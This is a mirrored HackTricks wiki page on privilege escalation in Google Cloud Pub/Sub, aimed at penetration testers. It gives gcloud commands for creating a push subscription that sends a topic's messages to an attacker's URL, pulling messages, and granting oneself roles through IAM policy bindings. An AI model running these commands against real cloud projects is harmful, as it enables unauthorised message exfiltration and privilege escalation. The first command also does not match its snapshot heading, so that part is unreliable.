mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-12 07:40:49 -08:00
2.0 KiB
2.0 KiB
GCP - Pubsub Privesc
{{#include ../../../banners/hacktricks-training.md}}
PubSub
Get more information in:
{{#ref}} ../gcp-services/gcp-pub-sub.md {{#endref}}
pubsub.snapshots.create (pubsub.topics.attachSubscription)
The snapshots of topics contain the current unACKed messages and every message after it. You could create a snapshot of a topic to access all the messages, avoiding access the topic directly.
gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>
pubsub.snapshots.setIamPolicy
Assign the pervious permissions to you.
pubsub.subscriptions.create
You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
pubsub.subscriptions.update
Set your own URL as push endpoint to steal the messages.
pubsub.subscriptions.consume
Access messages using the subscription.
gcloud pubsub subscriptions pull <SUSCRIPTION> \
--limit=50 \
--format="json" \
--project=<PROJECTID>
pubsub.subscriptions.setIamPolicy
Give yourself any of the preiovus permissions
# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"
# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"
# Change Policy
gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>
{{#include ../../../banners/hacktricks-training.md}}